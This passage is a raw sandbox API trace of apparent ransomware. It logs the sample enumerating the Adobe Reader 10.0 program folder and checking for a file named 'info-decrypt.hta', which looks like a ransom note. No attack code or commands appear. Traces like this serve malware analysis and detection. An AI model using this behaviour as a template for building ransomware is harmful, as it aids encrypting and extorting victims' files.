ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AIR", cAlternateFileName="")) returned 1 [0215.375] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5ef398, dwReserved0=0x0, dwReserved1=0x0, cFileName="authplay.dll", cAlternateFileName="")) returned 1 [0215.549] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXE8SharedExpat.dll", cAlternateFileName="AXE8SH~1.DLL")) returned 1 [0215.550] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x91590, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXSLE.dll", cAlternateFileName="")) returned 1 [0215.550] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1af88, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIB.dll", cAlternateFileName="")) returned 1 [0215.550] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x25b98, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIBUtils.dll", cAlternateFileName="")) returned 1 [0215.550] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d95e8c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Browser", cAlternateFileName="")) returned 1 [0215.550] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802ba700, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1b4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ccme_base.dll", cAlternateFileName="CCME_B~1.DLL")) returned 1 [0215.551] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff9aa20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2aa998, dwReserved0=0x0, dwReserved1=0x0, cFileName="CoolType.dll", cAlternateFileName="")) returned 1 [0215.551] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802945a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cryptocme2.dll", cAlternateFileName="CRYPTO~1.DLL")) returned 1 [0215.551] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8026e440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x647, dwReserved0=0x0, dwReserved1=0x0, cFileName="cryptocme2.sig", cAlternateFileName="CRYPTO~1.SIG")) returned 1 [0215.551] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17190, dwReserved0=0x0, dwReserved1=0x0, cFileName="Eula.exe", cAlternateFileName="")) returned 1 [0215.551] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820095e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa3ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtendScript.dll", cAlternateFileName="EXTEND~1.DLL")) returned 1 [0215.552] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb03a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="icucnv40.dll", cAlternateFileName="")) returned 1 [0215.552] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17790, dwReserved0=0x0, dwReserved1=0x0, cFileName="icudt40.dll", cAlternateFileName="")) returned 1 [0215.552] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x837d71e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xd46fa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="icudt40_full.dll", cAlternateFileName="ICUDT4~1.DLL")) returned 1 [0215.552] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1131a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="icuuc40.dll", cAlternateFileName="")) returned 1 [0215.553] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IDTemplates", cAlternateFileName="IDTEMP~1")) returned 1 [0215.553] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Javascripts", cAlternateFileName="JAVASC~1")) returned 1 [0215.553] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffc0b80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa6790, dwReserved0=0x0, dwReserved1=0x0, cFileName="JP2KLib.dll", cAlternateFileName="")) returned 1 [0215.553] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Legal", cAlternateFileName="")) returned 1 [0215.553] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Locale", cAlternateFileName="")) returned 1 [0215.553] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e1a400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x59de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logsession.dll", cAlternateFileName="LOGSES~1.DLL")) returned 1 [0215.554] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4d1e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2.exe", cAlternateFileName="LOGTRA~1.EXE")) returned 1 [0215.554] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d618a80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb9808, dwReserved0=0x0, dwReserved1=0x0, cFileName="Onix32.dll", cAlternateFileName="")) returned 1 [0215.554] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802e0860, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFPrevHndlr.dll", cAlternateFileName="PDFPRE~1.DLL")) returned 1 [0215.554] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80541e60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x724ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFSigQFormalRep.pdf", cAlternateFileName="PDFSIG~1.PDF")) returned 1 [0215.555] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80600540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x18dd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="pe.dll", cAlternateFileName="")) returned 1 [0215.555] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83529920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="piaglbreakfinder.dll", cAlternateFileName="PIAGLB~1.DLL")) returned 1 [0215.555] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plug_ins", cAlternateFileName="")) returned 1 [0215.555] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7dc322e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plug_ins3d", cAlternateFileName="PLUG_I~1")) returned 1 [0215.555] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="pmd.cer", cAlternateFileName="")) returned 1 [0215.555] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8b98, dwReserved0=0x0, dwReserved1=0x0, cFileName="reader_sl.exe", cAlternateFileName="READER~1.EXE")) returned 1 [0215.556] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc322e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x21af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="rt3d.dll", cAlternateFileName="")) returned 1 [0215.556] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x44a, dwReserved0=0x0, dwReserved1=0x0, cFileName="RTC.der", cAlternateFileName="")) returned 1 [0215.556] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8ff90, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScCore.dll", cAlternateFileName="")) returned 1 [0215.556] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x820095e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x820095e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x820095e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0215.556] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffc0b80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffc0b80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffc0b80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SPPlugins", cAlternateFileName="SPPLUG~1")) returned 1 [0215.557] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3cd90, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlite.dll", cAlternateFileName="")) returned 1 [0215.557] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801fc020, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8026e440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8026e440, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tracker", cAlternateFileName="")) returned 1 [0215.557] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801fc020, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4398, dwReserved0=0x0, dwReserved1=0x0, cFileName="ViewerPS.dll", cAlternateFileName="")) returned 1 [0215.557] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x11f98, dwReserved0=0x0, dwReserved1=0x0, cFileName="wow_helper.exe", cAlternateFileName="WOW_HE~1.EXE")) returned 1 [0215.557] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x11f98, dwReserved0=0x0, dwReserved1=0x0, cFileName="wow_helper.exe", cAlternateFileName="WOW_HE~1.EXE")) returned 0 [0215.558] FindClose (in: hFindFile=0xb7f590 | out: hFindFile=0xb7f590) returned 1 [0215.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef3c) returned 1 [0215.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef48) returned 1 [0215.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll", nBufferLength=0x105, lpBuffer=0x8f6e9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll", lpFilePart=0x0) returned 0x3c [0215.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\info-decrypt.hta", lpFilePart=0x0) returned 0x40 [0215.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee58) returned 1 [0215.558] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6eed4 | out: lpFileInformation=0x8f6eed4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0215.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee54) returned 1 [0215.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll", nBufferLength=0x105, lpBuffer=0x8f6e9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll", lpFilePart=0x0) returned 0x3c [0215.559] GetFullPathNameW (in: lpFileName="C:\\Program Files 